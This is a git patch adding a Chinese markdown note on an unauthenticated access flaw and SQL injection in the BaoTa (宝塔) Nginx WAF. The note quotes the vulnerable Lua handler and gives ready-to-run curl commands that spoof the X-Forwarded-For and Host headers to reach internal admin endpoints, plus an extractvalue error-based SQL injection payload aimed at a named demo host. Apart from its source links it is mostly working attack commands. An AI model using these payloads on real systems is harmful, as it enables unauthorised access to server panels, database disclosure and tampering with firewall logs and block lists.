From 9bf259f8a2ca9d19f48e3b5a4a091b72e5dce4a0 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sat, 17 Feb 2024 17:58:56 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E5=AE=9D=E5=A1=94=E6=9C=80=E6=96=B0?= =?UTF-8?q?=E6=9C=AA=E6=8E=88=E6=9D=83=E8=AE=BF=E9=97=AE=E6=BC=8F=E6=B4=9E?= =?UTF-8?q?=E5=8F=8Asql=E6=B3=A8=E5=85=A5.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 宝塔最新未授权访问漏洞及sql注入.md | 62 ++++++++++++++++++++++++++++++ 1 file changed, 62 insertions(+) create mode 100644 宝塔最新未授权访问漏洞及sql注入.md diff --git a/宝塔最新未授权访问漏洞及sql注入.md b/宝塔最新未授权访问漏洞及sql注入.md new file mode 100644 index 0000000..754dcd3 --- /dev/null +++ b/宝塔最新未授权访问漏洞及sql注入.md @@ -0,0 +1,62 @@ +## 宝塔最新未授权访问漏洞及sql注入 + +WAF 防火墙 (宝塔 Nginx 防火墙) 存在 SQL 注入漏洞和未授权漏洞 + +## 未授权 + +漏洞代码 +``` +start = function () + ... 此处身略若干行 + if ngx.var.remote_addr == "127.0.0.1" and ngx.ctx.Server_name == "127.0.0.251" and ngx.var.host == "127.0.0.251" then + if ngx.var.uri == "/get_btwaf_drop_ip" then + Public.return_message(200, uv0.get_btwaf_drop_ip()) + elseif ngx.var.uri == "/remove_btwaf_drop_ip" then + Public.return_message(200, uv0.remove_btwaf_drop_ip()) + elseif ngx.var.uri == "/clean_btwaf_drop_ip" then + Public.return_message(200, uv0.clean_btwaf_drop_ip()) + elseif ngx.var.uri == "/updateinfo" then + Public.return_message(200, uv0.updateInfo()) + elseif ngx.var.uri == "/get_site_status" then + Public.return_message(200, uv0.get_site_status()) + elseif ngx.var.uri == "/get_global_status" then + Public.return_message(200, uv0.get_global_status()) + end + + if ngx.var.uri == "/clean_btwaf_logs" then + Public.return_message(200, uv0.clean_btwaf_logs()) + end + + if ngx.var.uri == "/clear_speed_hit" then + Public.return_message(200, uv0.clear_speed_hit()) + end + + if ngx.var.uri == "/clear_replace_hit" then + Public.return_message(200, uv0.clear_replace_hit()) + end + + if ngx.var.uri == "/reset_customize_cc" then + Public.return_message(200, uv0.reset_customize_cc()) + end + + if ngx.var.uri == "/clear_speed_countsize" then + Public.return_message(200, uv0.clear_speed_countsize()) + end + end +end +``` +### 接口 +``` +curl 'http://宝塔地址/API' -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251' + +curl 'http://btwaf-demo.bt.cn/get_site_status?server_name=bt.cn' -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251' + +``` +## sql注入 +``` +curl "http://btwaf-demo.bt.cn/get_site_status?server_name='-extractvalue(1,concat(0x5c,database()))-'" -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251' +``` + +## 漏洞来源 +- https://mp.weixin.qq.com/s/7AqKcCS9puZgb9lG2KcAsg +- https://www.v2ex.com/t/1015932